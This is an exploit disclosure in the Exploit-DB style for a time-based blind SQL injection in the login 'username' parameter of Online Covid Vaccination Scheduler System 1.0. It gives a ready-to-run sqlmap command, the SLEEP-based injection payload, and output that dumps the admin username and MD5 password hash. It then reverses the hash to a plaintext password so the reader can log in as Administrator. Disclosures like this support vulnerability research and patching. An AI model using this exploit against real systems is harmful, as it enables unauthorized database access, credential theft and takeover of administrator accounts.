# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection# Date: 2021-07-07# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)# Vendor Homepage: https://www.sourcecodester.com/# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip# Version: 1.0# Tested on: Windows 10, XAMPP################# Description#################
The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection.
Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator.############ PoC ############
Run sqlmap to dump username and password:
$ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login"--data="username=admin&password=blabla"--cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5"--batch --answers="crack=N,dict=N,continue=Y,quit=N"-D scheduler -T users -C username,password --dump
############ Output############
Parameter: username (POST)
Type: time-based blind
Title: MySQL >=5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
web server operating system: Windows
web application technology: PHP 5.6.24, Apache 2.4.23
back-end DBMS: MySQL >=5.0.12(MariaDB fork)
current database:'scheduler'
Database: scheduler
Table: users
[1 entry]+----------+----------------------------------+| username | password |+----------+----------------------------------+| admin| 0192023a7bbd73250516f069df18b500 |+----------+----------------------------------+
The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123
